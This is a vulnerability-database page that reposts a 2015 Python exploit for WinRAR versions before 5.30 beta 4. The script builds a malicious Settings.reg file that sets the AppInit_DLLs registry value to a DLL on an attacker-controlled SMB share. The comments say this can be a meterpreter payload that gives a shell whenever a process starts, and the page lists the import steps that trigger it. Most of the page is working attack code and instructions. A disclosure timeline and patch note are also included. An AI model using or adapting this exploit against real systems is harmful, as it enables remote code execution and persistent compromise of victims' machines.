Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WinRar 5.30 beta 4 - Settings Import Command Execution Exploit

🗓️ 02 Oct 2015 00:00:00Reported by R-73eNType 
zdt
 zdt🔗 0day.today👁 17 Views

WinRar Settings Import Command Execution Exploit. Vulnerability in "Import Settings From File" function allows registry key overwrite for code execution. Trigger by importing specially crafted Settings.reg file. Vendor released patch in WinRAR 5.30 beta 4

Code
#!/usr/bin/python -w
# Title : WinRar Settings Import Command Execution
# Date : 02/10/2015
# Author : R-73eN
# Tested on : Windows 7 Ultimate
# Vulnerable Versions : Winrar < 5.30 beta 4
# The vulnerability exists in the "Import Settings From File" function.
# Since Settings file of Winrar are saved as a registry file and WinRar executes
# it in an automatic way without checking if it is writing to the Registry keys 
# used by winrar, we can create a specially crafted settings file and we can 
# overwrite registry keys.
# Since we have access to registry there are various ways we could use this to 
# get code execution such as defining "RUN" keys or creating new services etc 
# However the best way to get code execution is using AppInit DLLs
# AppInit DLLs are DLLs that are loaded into any process when it starts. 
# In this case, we can specify a meterpreter DLL payload using a UNC path on
# an SMB server we control and then next time a new process starts we will 
# get a shell.
# Read more about AppInit Dlls : https://support.microsoft.com/en-us/kb/197571
#
# Triggering the vulnerability
# 1) Run this python script.
# 2) Open WinRar
# 3) Click Options
# 4) Click Import/Export
# 5) Import Settings from file
# 6) Select the Specially crafted Settings.reg file
#
# Disclosure Timeline:
# 01/10/2015 - Vendor Contacted POC provided
# 02/10/2015 - Vendor released patch in WinRAR 5.30 beta 4 on  to verify
# presence of [HKEY_CURRENT_USER\Software\WinRAR] or
# [HKEY_CURRENT_USER\Software\WinRAR\
#
#
 
banner = ""
banner +="  ___        __        ____                 _    _  \n"
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
print banner
print "[+] WinRar Settings Import Command Execution [+]\n"
dll = raw_input("[+] Enter dll location (smb) : ")
dll = dll.replace("\\","\\\\")
print "[+] Writing Contet To Settings.reg [+]"
evil = 'Windows Registry Editor Version 5.00\n\n[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]\n"AppInit_DLLs"="' + dll + '"\n"LoadAppInit_DLLs"=dword:00000001\n'
print evil
f = open("Settings.reg","w")
f.write(evil)
f.close()
print "[+] Settings.reg created successfully [+]"
print "\n https://www.infogen.al/ \n"

#  0day.today [2018-01-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Oct 2015 00:00Current
6.8Medium risk
Vulners AI Score6.8
winrarvulnerabilitysettings importimport fileregistry keyscode executionpatchexploitspecially craftedvendorwinrar 5.30 beta 4
17